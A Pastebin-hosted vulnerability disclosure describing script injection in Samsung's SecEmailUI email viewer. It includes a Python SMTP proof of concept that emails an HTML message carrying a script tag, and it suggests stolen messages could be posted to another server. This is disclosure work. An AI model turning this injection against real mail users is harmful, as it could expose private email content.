API tools faq
paste
Advertisement
Guest User

Samsung SecEmailUI Script Injection

a guest
Nov 3rd, 2015
1,383
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events.
  2.  
  3. At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully.
  4.  
  5. This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.
  6.  
  7. Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
  8. '''
  9.  
  10. #!/usr/bin/env python
  11.  
  12. import smtplib
  13.  
  14. from email.mime.multipart import MIMEMultipart
  15. from email.mime.text import MIMEText
  16.  
  17. # Change the details here appropriate to your configuration
  18. me = "attacker@gmail.com"
  19. me_password = "THIS IS NOT REAL"
  20. you = "project.zero.test@gmail.com"
  21. smtp_server = "smtp.gmail.com"
  22.  
  23. msg = MIMEMultipart('alternative')
  24. msg['Subject'] = "Hello There!"
  25. msg['From'] = me
  26. msg['To'] = you
  27.  
  28. text = "Hello There!"
  29. html = """\
  30. <html>
  31. <head></head>
  32. <body>
  33. <p>
  34. <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
  35. </p>
  36. </body>
  37. </html>
  38. """
  39.  
  40. part1 = MIMEText(text, 'plain')
  41. part2 = MIMEText(html, 'html')
  42.  
  43. msg.attach(part1)
  44. msg.attach(part2)
  45.  
  46. s = smtplib.SMTP_SSL(smtp_server)
  47. s.login(me, me_password)
  48. s.sendmail(me, you, msg.as_string())
  49. s.quit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!